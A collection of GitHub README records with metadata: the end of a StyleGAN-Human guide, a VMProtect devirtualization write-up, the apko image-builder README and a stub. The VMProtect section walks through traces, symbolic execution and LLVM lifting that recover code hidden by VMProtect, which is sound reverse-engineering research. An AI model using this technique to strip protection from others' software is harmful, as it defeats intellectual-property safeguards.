--network=pretrained_models/stylegan_human_v2_1024.pkl --seeds=85,100 --outdir=outputs/inter_gifs ``` ### Style-mixing **image** using stylegan2 ``` python style_mixing.py --network=pretrained_models/stylegan_human_v2_1024.pkl --rows=85,100,75,458,1500 \\ --cols=55,821,1789,293 --styles=0-3 --outdir=outputs/stylemixing ``` ### Style-mixing **video** using stylegan2 ``` python stylemixing_video.py --network=pretrained_models/stylegan_human_v2_1024.pkl --row-seed=3859 \\ --col-seeds=3098,31759,3791 --col-styles=8-12 --trunc=0.8 --outdir=outputs/stylemixing_video ``` ### Aligned raw images For alignment, we use [openpose-pytorch](https://github.com/Hzzone/pytorch-openpose) for body-keypoints detection and [PaddlePaddle](https://github.com/PaddlePaddle/PaddleSeg/tree/release/2.5/contrib/PP-HumanSeg) for human segmentation. Before running the alignment script, few models need to be installed: 1. download [body_pose_model.pth](https://drive.google.com/drive/folders/1JsvI4M4ZTg98fmnCZLFM-3TeovnCRElG?usp=sharing) and place it into openpose/model/. 2. download and extract [deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax](https://paddleseg.bj.bcebos.com/dygraph/humanseg/export/deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax.zip) into PP_HumanSeg/export_model/deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax. 3. download and extract [deeplabv3p_resnet50_os8_humanseg_512x512_100k](https://paddleseg.bj.bcebos.com/dygraph/humanseg/train/deeplabv3p_resnet50_os8_humanseg_512x512_100k.zip) into PP_HumanSeg/pretrained_model/deeplabv3p_resnet50_os8_humanseg_512x512_100k. 4. install paddlepaddel: ``` pip install paddleseg ``` Then you can start alignment: ``` python alignment.py --image-folder img/test/ --output-folder aligned_image/ ``` ### Invert real image with [PTI](https://github.com/danielroich/PTI) Before inversion, please download our PTI weights: [e4e_w+.pt](https://drive.google.com/file/d/1NUfSJqLhsrU7c9PwAtlZ9xtrxhzS_6tu/view?usp=sharing) into /pti/. Few parameters you can change: - /pti/pti_configs/hyperparameters.py: - first_inv_type = 'w+' -> Use pretrained e4e encoder - first_inv_type = 'w' -> Use projection and optimization - /pti/pti_configs/paths_config.py: - input_data_path: path of real images - e4e: path of e4e_w+.pt - stylegan2_ada_shhq: pretrained stylegan2-ada model for SHHQ ``` python run_pti.py ``` Note: we used the test image under 'aligned_image/' (the output of alignment.py), the inverted latent code and fine-tuned generator will be saved in 'outputs/pti/' ### Editing with InterfaceGAN, StyleSpace, and Sefa ``` python edit.py --network pretrained_models/stylegan_human_v2_1024.pkl --attr_name upper_length \\ --seeds 61531,61570,61571,61610 --outdir outputs/edit_results ``` ### Editing using inverted latent code ``` python edit.py ---network outputs/pti/checkpoints/model_test.pkl --attr_name upper_length \\ --outdir outputs/edit_results --real True --real_w_path outputs/pti/embeddings/test/PTI/test/0.pt --real_img_path aligned_image/test.png ``` Note: 1. ''upper_length'' and ''bottom_length'' of ''attr_name'' are available for demo. 2. Layers to control and editing strength are set in edit/edit_config.py. ### Demo for [InsetGAN](https://arxiv.org/abs/2203.07293) We implement a quick demo using the key idea from InsetGAN: combining the face generated by FFHQ with the human-body generated by our pretrained model, optimizing both face and body latent codes to get a coherent full-body image. Before running the script, you need to download the [FFHQ face model]( https://docs.google.com/uc?export=download&confirm=t&id=125OG7SMkXI-Kf2aqiwLLHyCvSW-gZk3M), or you can use your own face model, as well as [pretrained face landmark](https://docs.google.com/uc?export=download&confirm=&id=1A82DnJBJzt8wI2J8ZrCK5fgHcQ2-tcWM) and [pretrained CNN face detection model for dlib](https://docs.google.com/uc?export=download&confirm=&id=1MduBgju5KFNrQfDLoQXJ_1_h5MnctCIG) ``` python insetgan.py --body_network=pretrained_models/stylegan_human_v2_1024.pkl --face_network=pretrained_models/ffhq.pkl \\ --body_seed=82 --face_seed=43 --trunc=0.6 --outdir=outputs/insetgan/ --video 1 ``` ## Results ### Editing ![](./img/editing.gif) ### InsetGAN re-implementation ![](./img/insetgan.gif) ### Editing with inverted real image (from left to right: real image | inverted image | InterFaceGAN result | StyleSpace result | SeFa result) https://user-images.githubusercontent.com/98547009/173773800-bb7fe54a-84d3-4b30-9864-a6b7b311f8ff.mp4 ### For more demo, please visit our [**web page**](https://stylegan-human.github.io/) . ## TODO List - [ ] Release 1024x512 version of StyleGAN-Human based on StyleGAN3 - [ ] Release 512x256 version of StyleGAN-Human based on StyleGAN1 - [ ] Extension of downstream application (InsetGAN): Add face inversion interface to support fusing user face image and stylegen-human body image - [x] Add Inversion Script into the provided editing pipeline - [ ] Release Dataset ## Related Works * (ICCV 2023) **UnitedHuman: Harnessing Multi-Source Data for High-Resolution Human Generation**, Jianglin Fu et al. [[Paper](https://arxiv.org/abs/2309.14335)], [[Code](https://github.com/UnitedHuman/UnitedHuman)], [[Project Page](https://unitedhuman.github.io/)] * (SIGGRAPH 2022) **Text2Human: Text-Driven Controllable Human Image Generation**, Yuming Jiang et al. [[Paper](https://arxiv.org/pdf/2205.15996.pdf)], [[Code](https://github.com/yumingj/Text2Human)], [[Project Page](https://yumingj.github.io/projects/Text2Human.html)], [[Dataset](https://github.com/yumingj/DeepFashion-MultiModal)] * (ICCV 2021) **Talk-to-Edit: Fine-Grained Facial Editing via Dialog**, Yuming Jiang et al. [[Paper](https://arxiv.org/abs/2109.04425)], [[Code](https://github.com/yumingj/Talk-to-Edit)], [[Project Page](https://www.mmlab-ntu.com/project/talkedit/)], [[Dataset](https://mmlab.ie.cuhk.edu.hk/projects/CelebA/CelebA_Dialog.html)] * (Technical Report 2022) **Generalizable Neural Performer: Learning Robust Radiance Fields for Human Novel View Synthesis**, Wei Cheng et al. [[Paper](https://arxiv.org/pdf/2204.11798.pdf)], [[Code](https://github.com/generalizable-neural-performer/gnr)], [[Project Page](https://generalizable-neural-performer.github.io/)], [[Dataset](https://generalizable-neural-performer.github.io/genebody.html)] ## Citation If you find this work useful for your research, please consider citing our paper: ```bibtex @article{fu2022styleganhuman, title={StyleGAN-Human: A Data-Centric Odyssey of Human Generation}, author={Fu, Jianglin and Li, Shikai and Jiang, Yuming and Lin, Kwan-Yee and Qian, Chen and Loy, Chen-Change and Wu, Wayne and Liu, Ziwei}, journal = {arXiv preprint}, volume = {arXiv:2204.11823}, year = {2022} ``` ## Acknowlegement Part of the code is borrowed from [stylegan (tensorflow)](https://github.com/NVlabs/stylegan), [stylegan2-ada (pytorch)](https://github.com/NVlabs/stylegan2-ada-pytorch), [stylegan3 (pytorch)](https://github.com/NVlabs/stylegan3).
StyleGAN-Human: A Data-Centric Odyssey of Human Generation
null
0
10
5
41
24
1
0
JonathanSalwan/VMProtect-devirtualization
<h1 align="center">VMProtect Devirtualization</h1> <p align="center"> An <b>experimental</b> dynamic approach to devirtualize pure functions protected by <b>VMProtect 3.x</b> </p> <p>&nbsp;</p> <p>&nbsp;</p> * [TL;DR](#tldr) * [Introduction](#introduction) * [The approach](#the-approach) * [Example 1: A simple bitwise operation protected](#example-1-a-simple-bitwise-operation-protected) * [Example 2: A MBA operation protected](#example-2-a-mba-operation-protected) * [Example 3: More than one basic block](#example-3-more-than-one-basic-block) * [Conclusion and limitations](#conclusion-and-limitations) * [References](#references) <p>&nbsp;</p> <p>&nbsp;</p> # TL;DR I am sharing some notes about a dynamic approach to devirtualize pure functions protected by VMProtect. This approach has shown very good results if the virtualized function only contains one basic block (regardless of its size). This is a common scenario when binaries protect arithmetic operations. However, this approach is a bit more experimental when the target function contains more than one basic block. Nevertheless, we managed to devirtualize and reconstruct the binary code from samples that contain 2 basic blocks which suggests that it is possible to fully devirtualize small functions dynamically. # Introduction [VMProtect](https://vmpsoft.com) is a software protection that protects code by running it through a virtual machine with non-standard architecture. This protection is a great playground for asm lovers [0, 1, 2, 3, 4, 5, 6, 11]. Also, there are already numerous tools that attack this protection [7, 8, 9, 12, 13]. In 2016 we took a look at the [Tigress](https://github.com/JonathanSalwan/Tigress_protection/) software protection solution and managed to defeat its virtualization using symbolic execution and LLVM. This approach has been presented at DIMVA 2018 [10] and I wanted to test it on VMProtect. Note that there is no magic solution that works on every binaries, there are always tradeoffs depending on the target and your goals. This modest contribution aims to provide an example of a dynamic attack against *pure functions* that are virtualized by VMProtect. The main advantage of a dynamic attack is that it defeats by design some VMProtect's static protections like self modifying code, key and operands encryption etc. We consider a pure function a function with a finite number of paths and that does not have side effects. There can be several inputs but only one output. Below is an example of a pure function: ```cpp int secret(int x, int y) { int r = x ^ y; return r; } ``` # The approach We rely on the key intuition that an obfuscated trace T' (from the obfuscated code P') combines original instructions from the original code P (the trace T corresponding to T' in the original code) and instructions of the virtual machine VM such that T' = T + VM(T). If we are able to distinguish between these two subsequences of instructions T and VM(T), we then are able to reconstruct one path of the original program P from a trace T'. By repeating this operation to cover all paths of the virtualized program, we will be able to reconstruct the original program P. In our practical example, the original code has a finite number of executable paths, which is the case in many situations involving intellectual property protection. To do so, we proceed with the following steps: 1. Identify the virtualized function and its arguments 2. Generate a VMProtect trace of the target 3. Replay the VMP trace and construct symbolic expressions to obtain the relation between inputs and output 4. Apply optimizations on symbolic expressions to avoid as much as possible instructions from the VM 5. Lift our symbolic representation to the LLVM-IR to build a new unprotected version of the target ## Example 1: A simple bitwise operation Let's take as a first example the following function: it takes two inputs and returns `x ^ y` which is protected by VMProtect. ```cpp int secret(int x, int y) { VMProtectBegin("secret"); int r = x ^ y; VMProtectEnd(); return r; } ``` We start by identifying where functions are using VMProtect and how many arguments they have. For our example we may have something like below: <p align="center"> <img src="assets/screen1.png"> </p> Just by reading the code we know that the function starts at the address `0x4011c0`, have two 32-bit arguments (`edi` and `esi`) and returns at `0x4011ef`. That's all the reverse-engineering we need. Next parts will be automatic. Now we have to generate an trace execution of this virtualized function. To do so we use a [Pintool](pin/source/tools/VMP_Trace/VMP_Trace.cpp). It only needs a `start` and an `end` address (for our example, `0x4011c0` and `0x4011ef`) which represents the range of the instrumentation. Note that any kind of DBI or emulator could do this job. ``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198895 -- ./vmp_binaries/binaries/sample2.vmp.bin 1 2 &> ./vmp_traces/sample2.vmp.trace ``` You can see the result [here](vmp_traces/sample2.vmp.trace). The trace format uses three kind of operations: `mr`, `r` and `i`. `mr` is a memory read access done by the instruction `i`, and `r` are the CPU registers. For example: ``` mr:0x7ffda459d718:8:0x227db4f8 r:0x40200a:0x0:0x7ffda459f571:0x2:0x40200a:0x0:0x0:0x7ffda459d688:0x0:0x0:0x7feee9b80ac0:0x7feee9b8000f:0xad1c3e:0x0:0x0:0x0 i:0x89173e:8:488BB42490000000 ``` We have a memory read that loads an `8` bytes constant `0x227db4f8` from the address `0x7ffda459d718`. The instruction is executed at the address `0x89173e` and its 8-bytes long opcode is `488BB42490000000` which is a [`mov rsi, qword ptr [rsp + 0x90]`](http://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=488BB42490000000&arch=x86-64&endianness=little&dis_with_addr=True&dis_with_raw=True&dis_with_ins=True#disassembly). The register state before the execution is the following: ```python (1) RAX = 0x40200a (9) R8 = 0 (2) RBX = 0 (10) R9 = 0 (3) RCX = 0x7ffda459f571 (11) R10 = 0x7feee9b80ac0 (4) RDX = 0x2 (12) R11 = 0x7feee9b8000f (5) RDI = 0x40200a (13) R12 = 0xad1c3e (6) RSI = 0 (14) R13 = 0 (7) RBP = 0 (15) R14 = 0 (8) RSP = 0x7ffda459d688 (16) R15 = 0 ``` Once the VMP trace has been generated, we replay it using the [attack_vmp.py](attack_vmp.py) script. This script uses [Triton](https://github.com/jonathansalwan/Triton) to build the path predicate of the trace. Note that all expressions which involve symbolic variables (inputs of the function) are kept symbolic while all non related input expressions are concretized. In other words, our symbolic expressions do not contain any operation related to the virtual machine (the machinery itself does not depend on the user) but only operations related to the original program. For example, below is an example of a concretization. On the left we have an AST that contains subexpressions which do not involve symbolic variable (`1 + 2` and `6 ^ 3`). So these branches are concretized and replaced by constants `3` and `5` which leads to the AST on the right. **This is how we devirtualize code.** <p align="center"> <img src="assets/screen2.png"> </p> **A note on formula-level backward slicing**: As it is common in symbolic execution, the symbolic representation is first computed in a forward manner along the path, then all logical operations and definitions affecting neither the final result nor the followed path are removed from the symbolic expression (formula slicing, a.k.a. formula pruning). This turns out to perform on the formula the equivalent of a backward slicing code analysis from the program output. Thus, at the return of the `secret` function, we have an expression of the relation between the inputs and the output without the instructions of VMProtect. The `./attack_vmp.py` script takes as parameters the trace file and the size of symbolic variables. Remember, it was `edi` and `esi`, so they are 4 bytes long. The result of the script is the following: ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample2.vmp.trace --symsize 4 [+] Replaying the VMP trace [+] Symbolize inputs [+] Instruction executed: 12462 [+] Emulation done [+] Return value: 0x3 [+] Devirt expr: (bvor (bvnot (bvor (bvnot (bvnot x)) (bvnot y))) (bvnot (bvor (bvnot x) (bvnot (bvand (bvnot y) (bvnot y)))))) [+] Synth expr: (bvxor x y) [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) { entry: %0 = xor i32 %SymVar_0, %SymVar_1 ret i32 %0 } [+] EOF LLVM IR ============================== ``` As we can see, the devirtualized expression returned by the `secret` function is pretty concise and does not contain instructions from the virtual machine. ```smt (bvor (bvnot (bvor (bvnot (bvnot x)) (bvnot y) ) ) (bvnot (bvor (bvnot x) (bvnot (bvand (bvnot y) (bvnot y) ) ) ) ) ) ``` However, we did not manage to recover the original expression which was a simple `XOR` operation. It looks like the `XOR` has been translated to bitwise operations. Luckily, we recently released new features in the Triton project which are a [synthesizer](https://github.com/JonathanSalwan/Triton/issues/1074) and a lifter to [LLVM-IR](https://github.com/JonathanSalwan/Triton/issues/1078). Thus, we can synthesize the expression which gives us the expression `(bvxor x y)`. It's a good win and now we can go further by lifting this expression to LLVM-IR and then compile a new devirtualized binary code. ## Example 2: A MBA operation protected Ok, now let's take a look at another example which tries to hide an MBA operation. The original source code is the following: ```cpp // This function is an MBA that computes: (x ^ 92) + y // We will protect this MBA with VMProtect and see if we can recover "(x ^ 92) + y" char secret(char x, char y) { VMProtectBegin("secret"); int a = 229 * x + 247; int b = 237 * a + 214 + ((38 * a + 85) & 254); int c = (b + ((-(2 * b) + 255) & 254)) * 3 + 77; int d = ((86 * c + 36) & 70) * 75 + 231 * c + 118; int e = ((58 * d + 175) & 244) + 99 * d + 46; int f = (e & 148); int g = (f - (e & 255) + f) * 103 + 13; int r = (237 * (45 * g + (174 * g | 34) * 229 + 194 - 247) & 255) + y; VMProtectEnd(); return r; } ``` Like with the first example, we have to identify where this function starts and ends and generate a VMP trace. ``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198857 -end 4199140 -- ./vmp_binaries/binaries/sample3.vmp.bin 1 2 &> ./vmp_traces/sample3.vmp.trace ``` Once the [VMP trace](vmp_traces/sample3.vmp.trace) is generated, let's run the `./attack_vmp.py` script. ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample3.vmp.trace --symsize 1 [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found on CF flag: 0x821dac: popfq - Model: {0: x:32 = 0xa3, 1: y:32 = 0xff} [+] A potential symbolic jump found on CF flag: 0x87f437: popfq - Model: {0: x:32 = 0xa3, 1: y:32 = 0xff} [+] Instruction executed: 25085 [+] Emulation done [+] Return value: 0x5f [+] Devirt expr: In: (bvadd (bvadd (bvshl (bvadd (_ bv1 32) (bvnot (bvlshr (concat (_ bv0 8) (_ bv0 8) ((_ extract 15 8) ... [+] Synth expr: In: (bvadd (bvadd (bvshl (bvadd (_ bv1 32) (bvnot (bvlshr (concat (_ bv0 8) (_ bv0 8) ((_ extract 15 8) ... [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i8 %SymVar_0, i8 %SymVar_1) { entry: %0 = xor i8 %SymVar_0, 92 %1 = and i8 %SymVar_0, 0 %2 = zext i8 %1 to i32 %3 = or i32 0, %2 %4 = shl i32 %3, 8 %5 = zext i8 %0 to i32 %6 = or i32 %4, %5 %7 = and i8 %SymVar_1, 0 %8 = zext i8 %7 to i32 %9 = or i32 0, %8 %10 = shl i32 %9, 8 %11 = zext i8 %SymVar_1 to i32 %12 = or i32 %10, %11 %13 = zext i8 %7 to i32 %14 = or i32 0, %13 %15 = shl i32 %14, 8 %16 = zext i8 %SymVar_1 to i32 %17 = or i32 %15, %16 %18 = lshr i32 %17, 7 %19 = xor i32 %18, -1 %20 = add i32 1, %19 %21 = shl i32 %20, 8 %22 = add i32 %21, %12 %23 = add i32 %22, %6 ret i32 %23 } [+] EOF LLVM IR ============================== ``` The result is pretty interesting for several reasons. First, we successfully managed to avoid as much as possible instructions from the virtual machine as we went from 25085 instructions executed to 25 LLVM instructions. However, we did not manage to get a good synthesized version of the output (yes, I know, we are going further than just doing devirtualization). The advantage of lifting our symbolic expressions to LLVM-IR is that we can fully benefit from LLVM's optimization pipeline. Let's do this: ```llvm $ opt -S -O3 ./devirt/sample3.ll ; ModuleID = 'devirt/sample3.ll' source_filename = "tritonModule" ; Function Attrs: mustprogress nofree norecurse nosync nounwind readnone willreturn define i32 @__triton(i8 %SymVar_0, i8 %SymVar_1) local_unnamed_addr #0 { entry: %0 = xor i8 %SymVar_0, 92 %1 = zext i8 %0 to i32 %2 = zext i8 %SymVar_1 to i32 %3 = shl nuw nsw i32 %2, 1 %4 = and i32 %3, 256 %5 = add nuw nsw i32 %1, %2 %6 = sub nsw i32 %5, %4 ret i32 %6 } ``` Using LLVM optimizations we managed to remove noise from our devirtualized output and thus break the MBA. We can see the `XOR` operation with its constant (`%0 = xor i8 %SymVar_0, 92`) and the `+ y` (`%6 = add nsw i32 %5, %1`). Instructions between are just dealing with the sign. To summarize this example, we fully devirtualized the `secret` function using the `attack_vmp.py` script and then we fully broke the MBA using LLVM optimizations. ## Example 3: More than one basic block We got very good results if the `secret` function only contains one basic block regardless of its size. So at this point we are able to devirtualize one path. To reconstruct the whole function behavior, we have to successively devirtualize reachable paths. To do so, we have to perform a path coverage on user-dependent branches. At the end, we get as a result a path tree which represents the different paths of the original function. Path tree is obtained by introducing if-then-else construction from two traces T1 and T2 with a same prefix followed by a condition C in T1 and a not(C) in T2. Once a path tree is built, we can let LLVM generate a CFG. <p align="center"> <img src="assets/screen3.png"> </p> With the Tigress software protection, virtual jumps were implemented with real `jcc` instructions which allowed us to quickly identify jump condition. However, things are getting more complex when virtual jumps are involved with VMProtect as it does not uses `jcc` instructions for jumping to another virtual block. We had to define markers on a dynamic trace to spot the condition involved in a user-dependent branch. This is the experimental part of this attack as markers are not really accurate but worked for our samples. Ok, let's consider the following sample: ```cpp int secret(int x, int y) { VMProtectBegin("secret"); int r = 0; if (x + y == 1001) r = x + 1; else r = y - 1; VMProtectEnd(); return r; } ``` Like with the first examples we have to generate and analyze the trace. ``` $./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198928 -- ./vmp_binaries/binaries/sample5.vmp.bin 1 2 &> ./vmp_traces/sample5.vmp.trace.1 $ ./attack_vmp.py --trace1 ./vmp_traces/sample5.vmp.trace.1 --symsize 4 [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found of AF flag: 0x80d905: cmp r11b, dl - Model: {0: x:32 = 0x0, 1: y:32 = 0x3e9} [+] Instruction executed: 16164 [+] Emulation done [+] Return value: 0x4 [+] Devirt expr: (bvnot (bvadd (bvand (bvnot y) (bvnot y)) (_ bv1 32))) [+] Synth expr: (bvadd y (_ bv4294967295 32)) [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_1) { entry: %0 = add i32 %SymVar_1, -1 ret i32 %0 } [+] EOF LLVM IR ============================== ``` The script tells us that there may be a potential symbolic jump found on the `AF` flag at address `0x80d905`. It also provides a new model (using symbolic execution) which should take the other path. So let's generate a second trace using this model (if you take a look to the model, it is correct regarding our source code). ``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198928 -- ./vmp_binaries/binaries/sample5.vmp.bin 0 1001 &> ./vmp_traces/sample5.vmp.trace.2 ``` Once the second trace is generated, we have to provide those two traces to the `attack_vmp.py` script so that it can merge them and create a path tree. We have extra options to define where the condition is located and on what flag (AF flag at `0x80d905`). ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample5.vmp.trace.1 --symsize 4 --trace2 ././vmp_traces/sample5.vmp.trace.2 --vbraddr 0x80d905 --vbrflag af [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found of AF flag: 0x80d905: cmp r11b, dl - Model: {0: x:32 = 0x0, 1: y:32 = 0x3e9} [+] Instruction executed: 16164 [+] Emulation done [+] A second trace has been provided [+] Replaying the VMP trace [+] Symbolize inputs [+] Instruction executed: 15758 [+] Emulation done [+] Merging expressions from trace1 and trace2 [+] Return value: 0x3e9 [+] Devirt expr: In: (ite (= (ite (= (_ bv16 8) (bvand (_ bv16 8) (bvxor (bvsub (_ bv80 8) ((_ extract 7 0) (bvadd (bvlsh ... [+] Synth expr: In: (ite (= (ite (= (_ bv16 8) (bvand (_ bv16 8) (bvxor (bvsub (_ bv80 8) ((_ extract 7 0) (bvadd (bvlsh ... [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) { entry: %0 = add i32 %SymVar_1, -1 %1 = add i32 %SymVar_0, 1 %2 = add i32 %SymVar_1, %SymVar_0 %3 = xor i32 %2, -1 %4 = xor i32 %2, -1 %5 = and i32 %4, %3 %6 = xor i32 %5, 1001 %7 = add i32 %5, 1001 %8 = xor i32 %5, 1001 %9 = xor i32 %8, %7 %10 = and i32 %9, %6 [... skip ...] %469 = add i64 %468, 140737488347280 %470 = trunc i64 %469 to i8 %471 = xor i8 80, %470 %472 = sub i8 80, %470 %473 = xor i8 %472, %471 %474 = and i8 16, %473 %475 = icmp eq i8 16, %474 %476 = select i1 %475, i1 true, i1 false %477 = icmp eq i1 %476, false %478 = select i1 %477, i32 %1, i32 %0 ret i32 %478 } [+] EOF LLVM IR ============================== ``` At this step we devirtualized the two traces and merged them into `if-then-else` expressions. After lifting the expression to LLVM-IR we get a CFG with only 480 LLVM instruction which is already a good win comparing to the thousands of instructions executed by the virtual machine. But we can do better if we use LLVM optimizations: ```llvm $ opt -S -O3 ./devirt/sample5.ll ; ModuleID = './devirt/sample5.ll' source_filename = "tritonModule" ; Function Attrs: mustprogress nofree norecurse nosync nounwind readnone willreturn define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) local_unnamed_addr #0 { entry: %0 = add i32 %SymVar_0, 1 %1 = add i32 %SymVar_1, -1 %2 = add i32 %SymVar_1, %SymVar_0 %.not = icmp eq i32 %2, 1001 %3 = select i1 %.not, i32 %0, i32 %1 ret i32 %3 } attributes #0 = { mustprogress nofree norecurse nosync nounwind readnone willreturn } ``` Woot, we recovered the original behavior of the `secret` function! # Conclusion and limitations While the approach showed very good results for functions that contain one path, the main limitation of the method is that it is mostly geared towards programs with a small number of paths due to the way VMProtect does virtual jumps. In case of a too high number of paths, parts of the original code may be lost, yielding an incomplete recovery. Note that we are considering executable paths rather than syntactic paths in the CFG. Hash and other cryptographic functions often have only very few paths - only one path in the case of timing-attack resistant implementations. Also our current implementation is limited to programs without any user-dependent memory access. This limitation can be partly removed by using a more symbolic handling of memory accesses in DSE. Note also that while bounded loops and non-recursive function calls are handled, they are currently recovered as inlined or unrolled code, causing a potential blowup in size of the devirtualized code. It would be interesting to have a post processing step trying to rebuild these high-level abstractions. To conclude, please note that I'm not aiming to provide any kind of magic method, those are just some notes about a dynamic attack against very specific cases protected by VMProtect =). If you want to take a deeper look, check out those resources: * [The Pintool to generate trace](pin/source/tools/VMP_Trace/VMP_Trace.cpp) * [Script to analyze a VMP trace](attack_vmp.py) * [Samples source code](vmp_binaries/samples-source) * [Original and protected binaries](vmp_binaries/binaries) * [VMP traces](vmp_traces) * [Devirtualized results](devirt) Last but not least, special thanks to my mate [@0vercl0k](https://twitter.com/0vercl0k) for proofreading and edits :rocket: # References ``` [00] https://www.usenix.org/legacy/event/woot09/tech/full_papers/rolles.pdf [01] https://secret.club/2021/09/08/vmprotect-llvm-lifting-1.html [02] https://secret.club/2021/09/08/vmprotect-llvm-lifting-2.html [03] https://secret.club/2021/09/08/vmprotect-llvm-lifting-3.html [04] https://back.engineering/17/05/2021/ [05] https://back.engineering/21/06/2021/ [06] https://www.mitchellzakocs.com/blog/vmprotect3 [07] https://github.com/can1357/NoVmp [08] https://github.com/archercreat/vmpfix [09] https://github.com/void-stack/VMUnprotect [10] https://github.com/JonathanSalwan/Triton/blob/master/publications/DIMVA2018-slide-deobfuscation-salwan-bardin-potet.pdf [11] https://whereisr0da.github.io/blog/posts/2021-02-16-vmp-3/ [12] https://github.com/pgarba/UniTaint [13] https://github.com/mrexodia/VMProtectTest ```
Playing with the VMProtect software protection. Automatic deobfuscation of pure functions using symbolic execution and LLVM.
vmprotect,symbolic-execution,program-analysis,llvm-ir,deobfuscation
0
1
2
4
0
1
0
chainguard-dev/apko
# apko: apk-based OCI image builder Build and publish [OCI container images](https://opencontainers.org/) built from [apk](https://wiki.alpinelinux.org/wiki/Package_management) packages. apko has the following key features: - **Fully reproducible by default.** Run apko twice and you will get exactly the same binary. - **Fast.** apko aims to build images in ms. - **Small.** apko generated images only contain what's needed by the application, in the style of [distroless](https://github.com/GoogleContainerTools/distroless). - **SBOM Support.** apko produces a Software Bill of Materials (SBOM) for images, detailing all the packages inside. - **Services.** apko supports using the [s6 supervision suite](https://skarnet.org/software/s6) to run multiple processes in a container without reaping or signalling issues. Please note that apko is a work in progress and details are subject to change! ## Installation You can install apko from Homebrew: ```shell brew install apko ``` You can also install apko from source: ```shell go install chainguard.dev/apko@latest ``` You can also use the apko container image: ```shell docker run cgr.dev/chainguard/apko version ``` To use the examples, you'll generally want to mount your current directory into the container, e.g.: ```shell docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar ``` Alternatively, if you're on a Mac, you can use [Lima](./mac/README.md) to run an Alpine Linux VM. ## Quickstart An apko file for building an Alpine base image looks like this: ```yaml contents: repositories: - https://dl-cdn.alpinelinux.org/alpine/edge/main packages: - alpine-base entrypoint: command: /bin/sh -l # optional environment configuration environment: PATH: /usr/sbin:/sbin:/usr/bin:/bin ``` We can build this with apko from any environment with apk tooling: ```shell apko build examples/alpine-base.yaml apko-alpine:test apko-alpine.tar ``` ``` ... 2022/04/08 13:22:31 apko (aarch64): generating SBOM 2022/04/08 13:22:31 building OCI image from layer '/tmp/apko-3027985148.tar.gz' 2022/04/08 13:22:31 OCI layer digest: sha256:ba034c07d0945abf6caa46fe05268d2375e4209e169ff7fdd34d40cf4e5f2dd6 2022/04/08 13:22:31 OCI layer diffID: sha256:9b4ab6bb8831352b25c4bd21ee8259d1f3b2776deec573733291d71a390157bb 2022/04/08 13:22:31 output OCI image file to apko-alpine.tar ``` or, with Docker: ```shell docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:test apko-alpine.tar ``` You can then load the generated tar image into a Docker environment: ```shell docker load < apko-alpine.tar ``` ```shell Loaded image: apko-alpine:test ``` ```shell docker run -it apko-alpine:test ``` ``` e289dc84c4ad:/# echo boo! boo! ``` You can also publish the image directly to a registry: ```shell apko publish examples/alpine-base.yaml myrepo/alpine-apko:test ``` See the [docs](./docs/apko_file.md) for details of the file format and the [examples directory](./examples) for more, err, examples! ## Why apko was created by [Chainguard](https://www.chainguard.dev), who require secure and reproducible container images for their tooling. Speed is also a critical factor; Chainguard require images to be rebuilt constantly in response to new versions and patches. The design of apko is heavily influenced by the [ko](https://github.com/google/ko) and [distroless](https://github.com/GoogleContainerTools/distroless) projects. ## Declarative Nature By design, apko doesn't support an equivalent of `RUN` statements in Dockerfiles. This means apko files are fully declarative and allows apko to make stronger statements about the contents of images. In particular, apko images are fully bitwise reproducible and can generate SBOMs covering their complete contents. In order to install bespoke tooling or applications into an image, they must first be packaged into an apk. This can be done with apko's sister tool [melange](https://github.com/chainguard-dev/melange). The combination of melange and apko cover the vast majority of use cases when building container images. In the cases where they are not a good fit, our recommendation is to build a base image with apko and melange, then use traditional tooling such as Dockerfiles for the final step. ## Support and Further Reading Tutorials and guides for apko can be found at the [Chainguard Academy](https://edu.chainguard.dev/open-source/apko/). For support, please find us on the [Kubernetes Slack](https://kubernetes.slack.com/) in the #apko channel or [open an issue](https://github.com/chainguard-dev/apko/issue). ## Related Work and Resources The [melange project](https://github.com/chainguard-dev/melange) is designed to produce apk packages to be used in apko. The [ko](https://github.com/google/ko) project builds Go projects from source in a similar manner to apko. The [kontain.me](https://github.com/imjasonh/kontain.me) service creates fresh container images on demand using different forms of declarative configuration (including ko and apko).
Build OCI images from APK packages directly without Dockerfile
docker,oci,containers
41
52
950
2,098
71
4
6
NafisiAslH/KnowledgeSharing
# KnowledgeSharing Under Construction .... </br>&nbsp; ## Support You can Follow [me](https://twitter.com/MeAsHacker_HNA) on twitter or <br><br><a href="https://www.buymeacoffee.com/NafisiAslH" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
null
null
0
2
2
348
2
1
0
projectdiscovery/nuclei-burp-plugin
